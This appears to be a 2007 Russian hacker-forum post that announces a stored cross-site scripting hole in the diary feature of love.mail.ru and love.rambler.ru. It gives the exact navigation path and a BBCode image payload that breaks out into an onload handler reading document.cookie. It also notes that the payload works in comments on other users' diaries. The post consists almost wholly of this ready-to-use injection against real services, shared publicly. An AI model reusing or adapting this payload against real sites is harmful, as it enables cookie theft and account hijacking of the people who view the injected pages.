
06.08.2007, 21:14
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме: 4155100
Репутация:
2033
|
|
love.mail.ru / love.rambler.ru active XSS
Теперь все это добро тупо перекочевало и собственно на мыло.ру, а также на рамблер.ру
Активная XSS на поддоменах MAIL.RU и RAMBLER.RU
Моя страница - Вкладка "Дневник" - "Добавить запись"
Вставляем
PHP код:
[img]http://img.mail.ru/mail/ru/images/dumb.gif"onload="alert(document.cookie); [/img]
С таким же успехом можно добавлять комментарии к записям в чужих дневниках.
Нет слов... Одни эмоции...
|
|
|